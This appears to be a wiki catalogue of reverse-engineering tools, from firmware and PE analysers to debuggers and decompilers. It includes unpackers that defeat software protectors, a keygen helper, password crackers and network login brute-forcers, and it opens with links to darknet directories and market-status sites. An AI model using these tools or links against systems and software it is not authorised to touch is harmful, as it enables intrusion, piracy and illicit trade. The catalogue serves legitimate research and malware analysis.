[https://zerosecurity.org/ Zero Security] - We provide the latest Information Security & Blockchain news. From website breaches to the latest phishing and malware threats impacting both sectors.

[https://tor.taxi/ tortaxi] - is your ride to the darknet.

[https://dark.fail/ dark.fail] - deepweb onion site links (This resource is intended for researchers only).

[https://vormweb.de/en/ vermweb] - Another deepweb search engine.

[https://tor.fish/ Tor.Fish] - lots of markets /w status.

[https://cock.li/ cock.li] - get yourself professional looking E-mail or XMPP addresses.

[https://torrentfreak.com/ TorrentFreak] - is a publication dedicated to bringing the latest news about copyright, privacy, and everything related to filesharing.

[http://www.openrce.org/articles/ OpenRCE] - Founded in June of 2005 as the brainchild of Pedram Amini, the Open Reverse Code Engineering community was created to foster a shared learning environment among researchers interested in the field of reverse engineering.

[https://www.bios-mods.com/forum/ Bios Mods] - Bios Mods -The Best BIOS Update and Modification Source.

[https://cs.rin.ru/forum cs.rin.ru] - Russian & English Steam underground community.

Software Tools

2026-04-04T18:08:21Z

Polymorphic7: re-ranked list in descending order based on overall popularity

[[File:Software_wiki_banner.png|frameless|1280x300px]]

Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!
==Tool Index==
 

====RF Signals Analysis====

*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.

*[https://www.gnuradio.org/ GNU Radio] - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.

*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.

*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -> Import –> Raw Data -> Radio Wave File)

----

====Firmware Analysis====

*[https://github.com/ReFirmLabs/binwalk binwalk] - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.

*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.

*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.

*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!

====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====

*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.

*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] - is a tool designed to extract files from any type of extractable file.

*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.

*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.

=====Themida Reverse Engineering=====

*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.

*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.

*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.

=====VMProtect Reverse Engineering=====

======VMProtect 2======

*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)
*vmassembler (VMProtect 2 Virtual Instruction Assembler)
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)
*vmhook (VMProtect 2 Virtual Machine Hooking Library)
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)
*vmdevirt (VMProtect Devirtualization)

======VMProtect 3======

*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).
*vmdevirt (VMProtect 3 Static Devirtualization)
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)

=====Code Virtualizer (Oreans Technologies)=====

*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.

=====Enigma Protector=====

*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.

======OllyDbg Scripts======
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]

=====Generic Code Virtualizer=====

*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.

====Reverse Engineering Toolkit AIO====
=====Windows‑focused=====
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit "All-In-One", Built for Security (Malware analysis, Penetration testing) & Educational purposes.
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.

=====Android‑focused=====
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...

====Binary PE Analysis / Editor (Windows)====

*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers. [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com

*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.

*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.

*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!

*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.

*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.

*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.

*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).

====Hex Editors====

*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.

*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.

*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.

*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.

====Pattern Matching / Pattern Searching====

*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.

*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.

*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.

*[https://github.com/stefankueng/grepWin grepWin] - is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.

*[https://astrogrep.sourceforge.net/ AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a "context" feature which is very nice for looking at source code.

====Comparison Tools (Binary differences)====

*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.

*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.

*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.

*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.

*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).

====IAT Reconstructors (Windows)====

*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.

====Process Monitors (Windows)====

*[https://github.com/winsiderss/systeminformer/ System Informer] - is a free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.

====Process Dumpers (Windows)====

*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.

*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.

====API monitoring ring3 (Windows)====

*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.

*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.

====Hashing & Crypto====
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills. 
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.

*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.

*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.

====Password cracking====
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.

Offline
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).

*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.

Online (network based bruteforce in LAN).
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.

*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.

*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.

====Virtualization technology (host isolation) or sandboxes====

*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.

*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.

*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.

*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.

*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.

*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production.

*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.

*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.

*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local & mapped drives or the Windows registry.

*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. "If you implement boundaries and nobody is around to push them, do they even exist?". Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?
----

====Dynamic & Static Analysis (mostly '''unmanged''' binaries)====

=====Interactive Disassemblers ('''static analysis''')=====

*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.

::Binary Ninja Scripts/Plugins/Extension
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.

*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].

::Ghidra Scripts/Plugins/Extension
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm & MIPS scripts] - ARM & MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.
:::*Qt Framework
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled & compiled with MSVC.
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.

*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.

::IDA Scripts/Plugins/Extension
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.
::::*Oreans CV scripts
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.
::IDA LLM Plugins
:::*Local (quantized LLMs Q4/INT4)
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.
:::*Cloud
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.

*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).

*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)

*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.

*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.

*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.

*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.

=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====

*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework. Includes Disassembler, Debugger, Emulation and Symbolik analysis engines. Includes built-in Server and Shared-Workspace functionality. Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism). Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA. Criticisms (from a core dev): "Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better. PR's and suggestions welcome." Best installed via Pip: <code>python3 -m pip install vivisect</code>

*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)

*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).

*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.

::OllyDbg Scripts/Plugins/Mods
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.

*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.

::x64dbg Plugins/Integrations/Templates
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for "all" versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.

*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.

*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.

::GDB Plugins/Integrations/Templates
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.

*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.

====Debugging and Profiling dynamic analysis (Linux)====

*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.

*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.

*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.

*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.

*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.

*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.

====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====

=====.NET (CLR)=====

*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo & '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.

======.NET deobfuscators======

::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.

======.NET memory dumpers======

::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.

======.NET tracers======

::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.

=====JAVA (JVM) Decompilers=====

:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly & Ethereum Decompilers.

======JAVA (ART/APK)======
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.

:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
